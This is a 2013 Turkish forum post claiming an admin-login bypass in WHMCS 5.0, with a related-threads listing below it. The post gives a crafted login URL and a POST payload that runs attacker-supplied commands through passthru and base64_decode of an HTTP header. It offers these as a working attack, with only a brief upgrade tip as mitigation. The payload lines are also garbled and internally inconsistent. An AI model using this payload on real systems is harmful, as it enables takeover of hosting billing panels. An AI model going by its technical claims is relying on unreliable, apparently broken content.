22 Ağustos 2013, 12:12 | #1 | |
Çevrimdışı
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0) | whmcs 5.x güvenlik açığı whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi. http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{} eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır. POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;"; PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}"; şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir, | |
|
Etiketler |
5x, açığı, güvenlik, whmcs |
Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| |
Benzer Konular | ||||
Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
Yok böyle güvenlik açığı! | Zen | Bilim Dünyasından Son Haberler | 0 | 19 Kasım 2012 14:09 |
İşlemcide güvenlik açığı! | Dilara | Güvenlik Açıkları | 0 | 23 Mart 2009 13:34 |
Explorer'da Güvenlik Açığı.. | Dilara | Güvenlik Açıkları | 0 | 26 Aralık 2008 10:50 |
DNS Güvenlik Açığı | Ocean | Güvenlik Açıkları | 2 | 07 Ağustos 2008 09:30 |
Güvenlik Açığı MSN'yi Karıştırdı | DoStNaMe | Güvenlik Açıkları | 0 | 09 Haziran 2005 15:10 |